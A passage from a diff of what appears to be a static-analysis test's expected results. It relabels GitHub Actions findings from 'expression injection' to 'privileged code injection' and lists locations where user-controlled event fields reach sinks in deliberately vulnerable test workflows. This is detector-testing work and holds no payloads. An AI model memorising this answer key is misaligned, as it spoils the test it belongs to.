| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | env.pr_message | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | github.event.pages[1].title | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | github.event.pages[11].title | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | github.event.pages[0].page_name | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | github.event.pages[2222].page_name | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | steps.trim-url.outputs.trimmed_url | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | github.event.issue.title | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | github.event.issue.body | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | env.global_env | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | env.job_env | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | env.step_env | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | github.event.review.body | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | github.head_ref | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | github.event.commits[11].message | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | github.event.commits[11].author.email | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | github.event.commits[11].author.name | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | github.event.head_commit.message | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | github.event.head_commit.author.email | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | github.event.head_commit.author.name | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | github.event.head_commit.committer.email | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | github.event.head_commit.committer.name | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | github.event.commits[11].committer.email | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | steps.step.outputs.value | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | needs.job1.outputs['job_output'] | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | github.event.workflow_run.head_commit.author.name | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | github.event.workflow_run.head_commit.committer.email | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | github.event.workflow_run.head_commit.committer.name | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | github.event.workflow_run.head_branch | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | github.event.workflow_run.head_repository.description | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. 
